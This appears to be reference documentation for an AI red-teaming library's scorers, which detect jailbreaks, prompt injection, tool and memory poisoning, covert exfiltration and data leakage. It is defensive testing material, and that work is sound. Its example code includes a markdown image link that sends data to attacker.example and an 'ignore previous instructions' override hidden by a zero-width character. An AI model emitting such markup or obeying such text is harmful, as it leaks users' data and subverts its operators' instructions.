Scorers Reference

130+ scorers across 34 modules for detecting jailbreaks, data leakage, tool abuse, reasoning attacks, and compliance violations.

Scorers evaluate attack outcomes: was the target jailbroken? Did it leak PII? Did an agent execute a poisoned tool? Every attack uses scorers automatically, and you can compose custom scoring pipelines for specialized detection.

Module: dreadnode.scorers.agentic_workflow

Detect attacks against agent workflow orchestration.

| Scorer | What it detects |
| --- | --- |
| phase_bypass_detected | Attempts to bypass phase transition approval |
| phase_downgrade_detected | Downgrade from post-exploitation to exploitation |
| tool_restriction_bypass_detected | Bypass of tool access restrictions |
| sql_injection_via_nlp_detected | SQL injection through NLP processing |
| cypher_injection_detected | Graph database query injection |
| malformed_json_injection_detected | Malformed JSON injection |
| mode_confusion_detected | Mode confusion attacks |
| intent_manipulation_detected | Intent manipulation in workflows |
| success_indicator_spoofing_detected | Spoofing of success indicators |
| todo_list_manipulation_detected | Manipulation of task lists |
| tool_priority_manipulation_detected | Tool priority/ordering manipulation |
| session_state_poisoning_detected | Session state poisoning |
| wordlist_exhaustion_detected | Wordlist exhaustion attacks |
| workflow_disruption_detected | Disruption of workflow execution |
| agentic_workflow_attack | Generic agentic workflow attack detector |

Module: dreadnode.scorers.agent_security

Detect attacks against agent infrastructure and identity.

| Scorer | What it detects |
| --- | --- |
| agent_identity_leaked | Leakage of agent identity and configuration |
| skill_integrity_compromised | Compromised skill package integrity |
| agent_config_tampered | Tampering with agent configuration |
| heartbeat_manipulation | Manipulation of agent heartbeat mechanisms |
| bootstrap_hook_injected | Injected bootstrap hooks in agent startup |
| skill_supply_chain_attack | Skill supply chain attack indicators |
| memory_injection_detected | False memory injection |
| permission_escalation_detected | Permission escalation attempts |
| workspace_poisoning_detected | Workspace file poisoning |

Module: dreadnode.scorers.agentic

Score agent tool usage for safety and manipulation detection.

| Scorer | What it detects |
| --- | --- |
| tool_invoked | Whether a specific tool was invoked |
| any_tool_invoked | Whether any of the specified tools were invoked |
| tool_count | Number of tools invoked |
| tool_selection_safety | Agent tool selection safety (OWASP ASI02) |
| dangerous_tool_args | Dangerous argument patterns in tool calls |
| tool_sequence | Whether tools were called in a specific sequence |
| indirect_injection_success | Indirect injection payload influenced output |
| cascade_propagation | Attack propagation distance through multi-agent system |
| mcp_tool_manipulation | MCP tool description poisoning affected behavior |
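
To make the idea behind a sequence check such as tool_sequence concrete, here is a minimal standalone sketch. It does not use the dreadnode API: the function name `tools_called_in_order` and the choice to treat the expected tools as an ordered subsequence (other calls may appear in between) are assumptions for illustration, and the library's scorer may define "sequence" differently.

```python
from typing import Sequence


def tools_called_in_order(calls: Sequence[str], expected: Sequence[str]) -> float:
    """Return 1.0 if `expected` occurs in `calls` as an ordered subsequence, else 0.0.

    Hypothetical helper, not the library's implementation.
    """
    remaining = iter(calls)
    # `name in remaining` consumes the iterator up to the match, so each
    # expected tool must appear after the previously matched one.
    return 1.0 if all(name in remaining for name in expected) else 0.0


calls = ["search", "read_file", "shell", "send_email"]
print(tools_called_in_order(calls, ["read_file", "send_email"]))  # read, then exfiltrate
print(tools_called_in_order(calls, ["send_email", "read_file"]))  # wrong order
```

A subsequence match tolerates benign calls between the steps of interest; a stricter variant would require the tools to be adjacent.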

Module: dreadnode.scorers.advanced_jailbreak_detection

Detect sophisticated jailbreak techniques.

| Scorer | What it detects |
| --- | --- |
| likert_exploitation_detected | Likert-scale evaluation framing to bypass filters |
| prefill_bypass_detected | Prefill/affirmative-start bypass attempts |
| fictional_framing_detected | Deep fictional immersion and nested role-play |
| pipeline_manipulation_detected | LLM processing pipeline manipulation |
| guardrail_dos_detected | Guardrail denial-of-service patterns |
| invisible_character_detected | Invisible Unicode characters bypassing filters |
| memory_poisoning_detected | Agent memory or persistent state poisoning |
| tool_chain_attack_detected | Structured tool-chain escalation attacks |
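
As an illustration of what invisible-character detection can look like, the sketch below flags every character in Unicode general category Cf (format characters such as zero-width spaces, joiners, and bidi controls). This is an assumed approach using only the standard library; `find_invisible_characters` is a hypothetical name, and invisible_character_detected may use a different character set.

```python
import unicodedata


def find_invisible_characters(text: str) -> list[tuple[int, str]]:
    """Return (index, character name) for each Unicode format (Cf) character."""
    hits = []
    for index, char in enumerate(text):
        if unicodedata.category(char) == "Cf":
            # Fall back to the code point when the character has no name.
            hits.append((index, unicodedata.name(char, f"U+{ord(char):04X}")))
    return hits


payload = "ig\u200bnore previous instructions"
print(find_invisible_characters(payload))
```

Legitimate text can also contain Cf characters (emoji joiner sequences, or the zero-width non-joiner in Persian), so a check like this is best treated as a signal rather than a verdict.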

Module: dreadnode.scorers.mcp_security

Detect attacks against the Model Context Protocol layer.

| Scorer | What it detects |
| --- | --- |
| tool_description_poisoned | Poisoned instructions in MCP tool descriptions |
| cross_server_shadow_detected | Cross-server tool shadowing |
| rug_pull_detected | MCP rug pull attacks |
| tool_output_injected | Injection into tool output handling |
| schema_poisoned | Poisoned tool schemas |
| ansi_cloaking_detected | ANSI escape cloaking in tool descriptions |
| sampling_injection_detected | Sampling parameter injection |

Module: dreadnode.scorers.multi_agent_security

Detect inter-agent attacks and trust boundary violations.

| Scorer | What it detects |
| --- | --- |
| prompt_infection_detected | Self-replicating prompt infection patterns |
| agent_spoofing_detected | Agent spoofing/identity fraud |
| consensus_poisoned | Consensus poisoning attacks |
| delegation_exploit_detected | Delegation chain exploitation |
| session_smuggling_detected | Session smuggling in agent-to-agent communication |
| agent_config_overwrite_detected | Agent configuration overwriting |

Module: dreadnode.scorers.reasoning_security

Detect attacks against chain-of-thought and reasoning models.

| Scorer | What it detects |
| --- | --- |
| cot_backdoor_detected | Poisoned reasoning steps in chain-of-thought |
| reasoning_hijack_detected | Reasoning hijacking attacks |
| reasoning_dos_detected | Reasoning denial-of-service |
| escalation_detected | Multi-turn escalation (Crescendo, FITD) |
| goal_drift_detected | Goal drift in agent systems |

Module: dreadnode.scorers.ide_security

Detect attacks targeting coding assistants and IDE integrations.

| Scorer | What it detects |
| --- | --- |
| config_persistence | Configuration file modifications for persistence |
| rug_pull_detection | Rug pull attacks on coding assistants |
| shadowing_detection | Tool shadowing attacks |
| tool_squatting | Tool squatting attacks |
| covert_exfiltration | Covert exfiltration via IDE |

Module: dreadnode.scorers.documentation_security

Detect documentation-based injection and exfiltration.

| Scorer | What it detects |
| --- | --- |
| hidden_documentation_injection | Hidden instructions in docs targeting AI |
| env_var_exfiltration | Environment variable exfiltration via docs |
| favicon_exfiltration | Favicon-based data exfiltration |
| resource_hint_exfil | Resource hint-based exfiltration |
| package_readme_poisoning | Poisoning of package README files |

Module: dreadnode.scorers.contains

Pattern-based content detection.

| Scorer | What it detects |
| --- | --- |
| contains | Whether output contains a specific string or regex |
| detect_refusal | Refusal patterns in model output |
| detect_ansi_escapes | ANSI escape codes in output |
| detect_unsafe_shell_content | Unsafe shell commands/paths |
| detect_sensitive_keywords | Sensitive keywords (passwords, API keys) |
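
Pattern-based detection of this kind usually comes down to a compiled regular expression. The sketch below shows one way to detect ANSI escape codes with the standard library; the pattern covers CSI and OSC sequences only, and the names `ANSI_PATTERN`, `contains_ansi`, and `strip_ansi` are illustrative assumptions rather than what detect_ansi_escapes uses internally.

```python
import re

# Hypothetical pattern: CSI sequences (colors, cursor movement) and
# OSC sequences (window titles, hyperlinks) terminated by BEL or ESC \.
ANSI_PATTERN = re.compile(
    r"\x1b\[[0-?]*[ -/]*[@-~]"
    r"|\x1b\][^\x07\x1b]*(?:\x07|\x1b\\)"
)


def contains_ansi(text: str) -> float:
    """Return 1.0 if the text contains at least one ANSI escape sequence."""
    return 1.0 if ANSI_PATTERN.search(text) else 0.0


def strip_ansi(text: str) -> str:
    """Remove the escape sequences so the visible text can be inspected."""
    return ANSI_PATTERN.sub("", text)


colored = "\x1b[31mred\x1b[0m"
print(contains_ansi(colored), repr(strip_ansi(colored)))
```

Comparing the raw and stripped text is a simple way to see what a terminal would hide from a human reviewer.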

Module: dreadnode.scorers.exfiltration_detection

Detect data exfiltration through covert channels.

| Scorer | What it detects |
| --- | --- |
| markdown_exfil_detected | Markdown image/link-based exfiltration |
| unicode_exfil_detected | Unicode-based exfiltration |
| dns_exfil_detected | DNS tunneling exfiltration |
| ssrf_exfil_detected | SSRF-based exfiltration |
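
Markdown image exfiltration works because a chat client fetches the image URL automatically, carrying any data the model placed in the query string. The following sketch shows one plausible heuristic: flag image URLs that carry a query string and point to a host outside an allowlist. The function name, the `allowed_hosts` parameter, and the heuristic itself are assumptions for illustration, not the behavior of markdown_exfil_detected.

```python
import re
from urllib.parse import urlparse

# Matches ![alt](http(s)://...) and captures the URL.
IMAGE_PATTERN = re.compile(r"!\[[^\]]*\]\((https?://[^)\s]+)\)")


def markdown_exfil_urls(
    text: str, allowed_hosts: frozenset[str] = frozenset()
) -> list[str]:
    """Return image URLs that carry a query string to a non-allowlisted host."""
    suspicious = []
    for url in IMAGE_PATTERN.findall(text):
        parsed = urlparse(url)
        if parsed.hostname not in allowed_hosts and parsed.query:
            suspicious.append(url)
    return suspicious


output = (
    "Done. ![status](https://attacker.example/p.png?d=c2VjcmV0) "
    "![logo](https://cdn.example/logo.png)"
)
print(markdown_exfil_urls(output))
```

Data can also be smuggled in the URL path or a subdomain, so a production check would need to look beyond the query string.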

Modules: dreadnode.scorers.pii, dreadnode.scorers.credentials

| Scorer | What it detects |
| --- | --- |
| detect_pii | PII patterns (email, phone, IP, SSN) via regex |
| detect_pii_with_presidio | PII using Microsoft Presidio analyzer |
| credential_leakage | API keys, tokens, passwords (16 credential patterns) |
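
For a sense of what regex-based PII detection involves, here is a small standalone sketch covering the four categories named for detect_pii. The patterns are deliberately simple and are assumptions of this example (US-style phone and SSN formats, no range validation on IPv4 octets); they are not the patterns the library ships.

```python
import re

# Hypothetical, simplified patterns for illustration only.
PII_PATTERNS = {
    "email": re.compile(r"\b[\w.+-]+@[\w-]+(?:\.[\w-]+)+\b"),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "ipv4": re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b"),
    "phone": re.compile(r"\b\d{3}[-.\s]\d{3}[-.\s]\d{4}\b"),
}


def find_pii(text: str) -> dict[str, list[str]]:
    """Return the matches for each PII category that occurs in the text."""
    found = {}
    for kind, pattern in PII_PATTERNS.items():
        matches = pattern.findall(text)
        if matches:
            found[kind] = matches
    return found


sample = "Contact alice@example.com or 555-867-5309; SSN 123-45-6789, host 10.0.0.1"
print(find_pii(sample))
```

Regexes are fast and dependency-free but miss names, addresses, and free-form identifiers, which is where an analyzer-based scorer such as detect_pii_with_presidio is the better fit.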

Module: dreadnode.scorers.prompt_leak

| Scorer | What it detects |
| --- | --- |
| system_prompt_leaked | System prompt content in model output |

Modules: dreadnode.scorers.judge, dreadnode.scorers.harm

| Scorer | What it detects |
| --- | --- |
| llm_judge | LLM-based semantic judgment (configurable criteria) |
| detect_harm_with_openai | Harmful content via OpenAI moderation API |

Module: dreadnode.scorers.classification

| Scorer | What it detects |
| --- | --- |
| zero_shot_classification | Zero-shot text classification |
| detect_refusal_with_zero_shot | Refusal detection via zero-shot classifier |

Module: dreadnode.scorers.attack_outcome

Evaluate the practical impact of successful attacks.

| Scorer | What it detects |
| --- | --- |
| malicious_intent_fulfilled | Whether the model’s output fulfills the attacker’s malicious intent |
| practical_outcome | Whether the output has practical real-world utility for harm |
| cumulative_harm | Cumulative harm across multi-turn conversations |
| resilience_gap | Gap between model’s intended safety and actual behavior |

Module: dreadnode.scorers.judge_ensemble

Multi-judge and rubric-based scoring for more reliable evaluation.

| Scorer | What it detects |
| --- | --- |
| multi_judge_consensus | Consensus scoring across multiple LLM judges |
| rubric_judge | Rubric-based scoring with structured evaluation criteria |
| agent_as_judge | Agent-based evaluation with tool access |

Module: dreadnode.scorers.structural_detection

Detect structural exploit patterns in model outputs.

| Scorer | What it detects |
| --- | --- |
| template_exploit_detected | Template-based exploit patterns |
| m2s_reformatting_detected | Multi-step to single-step reformatting attacks |
| echo_chamber_detected | Echo chamber / completion bias exploitation |
| stego_acrostic_detected | Steganographic acrostic patterns |
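
An acrostic hides a message in the first letter of each line, so the simplest possible check reads those letters back and searches them for a target word. The sketch below illustrates that idea only; `first_letters` and `hides_word` are hypothetical helpers, and stego_acrostic_detected may rely on a different method entirely.

```python
def first_letters(text: str) -> str:
    """Join the first character of every non-empty line."""
    return "".join(line.strip()[0] for line in text.splitlines() if line.strip())


def hides_word(text: str, word: str) -> float:
    """Return 1.0 if the line-initial letters spell out `word` (case-insensitive)."""
    return 1.0 if word.lower() in first_letters(text).lower() else 0.0


poem = "Have a nice day\nEvery morning\nLook outside\nPlease smile"
print(first_letters(poem), hides_word(poem, "help"))
```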

Module: dreadnode.scorers.supply_chain_detection

Detect supply chain attack indicators.

| Scorer | What it detects |
| --- | --- |
| package_hallucination | Hallucinated package names that could be registered by attackers |
| merge_backdoor_detected | Backdoor indicators in model merge outputs |
| skill_poisoning_detected | Skill/plugin poisoning patterns |

| Module | Scorers | Description |
| --- | --- | --- |
| similarity | 5 | Semantic similarity (sentence transformers, TF-IDF, LiteLLM, BLEU) |
| sentiment | 2 | Sentiment analysis, Perspective API |
| length | 3 | Text length targeting, ratio, range |
| format | 2 | JSON/XML validation |
| readability | 1 | Text readability level |
| lexical | 1 | Type-token ratio (vocabulary diversity) |
| consistency | 1 | Character-level consistency |
| memorization | 1 | Training data memorization |
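
The type-token ratio mentioned for the lexical module is the number of distinct words divided by the total number of words. A minimal sketch follows, assuming a simple lowercase regex tokenizer; the library's tokenization may differ, and `type_token_ratio` is a name chosen for this example.

```python
import re


def type_token_ratio(text: str) -> float:
    """Distinct tokens divided by total tokens; 0.0 for empty input."""
    # Assumed tokenizer: lowercase runs of letters, digits, and apostrophes.
    tokens = re.findall(r"[a-z0-9']+", text.lower())
    return len(set(tokens)) / len(tokens) if tokens else 0.0


print(type_token_ratio("the cat and the dog"))  # 4 distinct tokens out of 5
```

Values near 1.0 indicate varied vocabulary; values near 0.0 indicate heavy repetition, which can be a sign of degenerate or looping output.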

Module: dreadnode.core.scorer

Combine scorers with logical and arithmetic operators:

from dreadnode.scorers import (
    credential_leakage,
    detect_pii,
    detect_refusal,
    llm_judge,
    system_prompt_leaked,
)
from dreadnode.core.scorer import or_, and_, avg, threshold, invert

# Score 1.0 if ANY leakage is detected
any_leak = or_(detect_pii(), credential_leakage(), system_prompt_leaked())

# Average of multiple scorers
combined = avg(detect_pii(), credential_leakage())

# Invert a score (1 - x)
no_refusal = invert(detect_refusal())

# Apply threshold
jailbreak = threshold(llm_judge(criteria="..."), value=0.7)

Available operators: add, and_, avg, clip, equals, forward, invert, normalize, not_, or_, remap_range, scale, subtract, threshold, weighted_avg
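
To show the semantics these combinators describe without depending on the library, the sketch below models a scorer as a plain function from text to a float and re-creates four of the operators. Everything here is an illustrative assumption: the names (`any_of`, `mean_of`, `inverted`, `at_least`), the toy scorers, and the choice of `>=` for the threshold comparison are not taken from dreadnode.core.scorer.

```python
from typing import Callable

Scorer = Callable[[str], float]


def any_of(*scorers: Scorer) -> Scorer:
    """1.0 if any scorer returns a positive score (analogous to or_)."""
    return lambda text: 1.0 if any(s(text) > 0 for s in scorers) else 0.0


def mean_of(*scorers: Scorer) -> Scorer:
    """Arithmetic mean of the scores (analogous to avg)."""
    return lambda text: sum(s(text) for s in scorers) / len(scorers)


def inverted(scorer: Scorer) -> Scorer:
    """1 - x (analogous to invert)."""
    return lambda text: 1.0 - scorer(text)


def at_least(scorer: Scorer, value: float) -> Scorer:
    """1.0 if the score reaches `value`; the >= comparison is an assumption."""
    return lambda text: 1.0 if scorer(text) >= value else 0.0


# Toy scorers standing in for real detectors.
def has_email(text: str) -> float:
    return 1.0 if "@" in text else 0.0


def has_key(text: str) -> float:
    return 1.0 if "sk-" in text else 0.0


leak = any_of(has_email, has_key)
print(leak("mail a@b.c"), mean_of(has_email, has_key)("mail a@b.c"))
```

Because each combinator returns another scorer, they nest freely, for example `at_least(mean_of(has_email, has_key), 0.7)`.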